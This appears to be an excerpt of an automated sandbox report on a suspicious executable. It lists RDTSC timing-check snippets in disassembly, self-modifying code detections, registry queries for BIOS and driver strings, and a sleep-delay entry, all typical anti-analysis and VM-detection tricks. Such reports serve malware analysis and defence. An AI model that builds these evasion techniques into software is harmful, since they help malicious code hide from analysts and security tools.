              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60219A7 second address: 60219CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF3CD0A8ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b adc esi, 420E75B3h 0x00000011 lea ebx, dword ptr [ebp+1245760Ch] 0x00000017 mov esi, dword ptr [ebp+122D31F5h] 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60219CF second address: 60219F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FBF3CE524C9h 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007FBF3CE524C4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040DFD second address: 6040E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040E01 second address: 6040E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CE524B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBF3CE524BAh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040E1D second address: 6040E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040E27 second address: 6040E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040E2F second address: 6040E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040E36 second address: 6040E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6040F91 second address: 6040F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60410F8 second address: 6041120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF3CE524C7h 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FBF3CE524B6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604153D second address: 6041541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6041541 second address: 604154C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60416A8 second address: 60416AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60416AF second address: 60416B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60416B5 second address: 60416C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FBF3CD0A8A6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6041B15 second address: 6041B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6039409 second address: 603940E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603940E second address: 6039417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6041F3F second address: 6041F90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FBF3CD0A8B5h 0x00000012 jnc 00007FBF3CD0A8A6h 0x00000018 jmp 00007FBF3CD0A8B0h 0x0000001d popad 0x0000001e jmp 00007FBF3CD0A8ACh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604246B second address: 6042471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604283F second address: 6042863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8B5h 0x00000009 popad 0x0000000a jmp 00007FBF3CD0A8AAh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6042863 second address: 6042868 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6042868 second address: 604287A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF3CD0A8A6h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604287A second address: 60428B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007FBF3CE524C9h 0x0000000e jmp 00007FBF3CE524C7h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6042B55 second address: 6042B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600FBEB second address: 600FBF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600FBF5 second address: 600FBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600FBF9 second address: 600FC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF3CE524CBh 0x0000000c jmp 00007FBF3CE524C3h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBF3CE524C8h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007FBF3CE524B8h 0x00000021 push eax 0x00000022 pop eax 0x00000023 jmp 00007FBF3CE524C7h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600FC54 second address: 600FC5E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF3CD0A8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600FC5E second address: 600FC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604581B second address: 6045820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E931 second address: 604E935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E935 second address: 604E965 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF3CD0A8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF3CD0A8ADh 0x00000012 jmp 00007FBF3CD0A8B6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E965 second address: 604E96A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604DD86 second address: 604DD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604DD8B second address: 604DD90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604DEF4 second address: 604DEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604DEFA second address: 604DF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF3CE524BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604DF0F second address: 604DF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E069 second address: 604E06F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E06F second address: 604E079 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E079 second address: 604E08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524BFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E08C second address: 604E090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E090 second address: 604E0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E0AB second address: 604E0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E1F8 second address: 604E1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E1FC second address: 604E207 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E207 second address: 604E218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF3CE524B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E218 second address: 604E21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E21C second address: 604E220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E220 second address: 604E22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF3CD0A8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604E22F second address: 604E235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604F06F second address: 604F075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604F310 second address: 604F320 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604F320 second address: 604F324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604FC02 second address: 604FC12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604FF4D second address: 604FF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604FF56 second address: 604FF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604FF5A second address: 604FF72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604FF72 second address: 604FF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605021B second address: 6050287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FBF3CD0A8A6h 0x00000009 jmp 00007FBF3CD0A8AAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FBF3CD0A8A8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 jmp 00007FBF3CD0A8AEh 0x00000035 pushad 0x00000036 push esi 0x00000037 pop esi 0x00000038 jmp 00007FBF3CD0A8B9h 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 pop esi 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60507C4 second address: 60507C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60507C8 second address: 605081C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3CD0A8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e clc 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FBF3CD0A8A8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FBF3CD0A8B1h 0x00000033 push eax 0x00000034 pushad 0x00000035 push ecx 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 pop ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6052155 second address: 60521E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CE524B6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007FBF3CE524C6h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FBF3CE524B8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FBF3CE524C8h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007FBF3CE524B8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 push 00000000h 0x00000056 movsx esi, si 0x00000059 stc 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60521E4 second address: 60521E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60521E9 second address: 60521FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60521FD second address: 6052222 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3CD0A8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FBF3CD0A8A6h 0x00000016 jmp 00007FBF3CD0A8AEh 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6052222 second address: 605222C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF3CE524BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055851 second address: 6055863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CD0A8A6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055863 second address: 6055867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605909D second address: 60590AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6059683 second address: 6059687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6054A3C second address: 6054A41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D927 second address: 605D939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007FBF3CE524B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605D939 second address: 605D93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6056073 second address: 6056077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6063C33 second address: 6063C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8AAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6056077 second address: 605607D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605607D second address: 6056087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBF3CD0A8A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606533A second address: 6065345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6065345 second address: 606534A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606640F second address: 6066424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FBF3CE524BCh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6067424 second address: 6067436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CD0A8ADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606A528 second address: 606A5A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FBF3CE524B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 or bh, 00000054h 0x00000025 mov dword ptr [ebp+122D30B6h], eax 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e push esi 0x0000002f mov ecx, dword ptr [ebp+122D5D13h] 0x00000035 pop ecx 0x00000036 sub dword ptr [ebp+122D31D2h], eax 0x0000003c popad 0x0000003d mov di, EFC3h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007FBF3CE524B8h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jg 00007FBF3CE524BCh 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 606BED3 second address: 606BED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607915A second address: 607915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1FCB35 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3CDA4A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3B5E1C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 606BF22 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 60D46F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3868Thread sleep time: -40020s >= -30000sJump to behavior
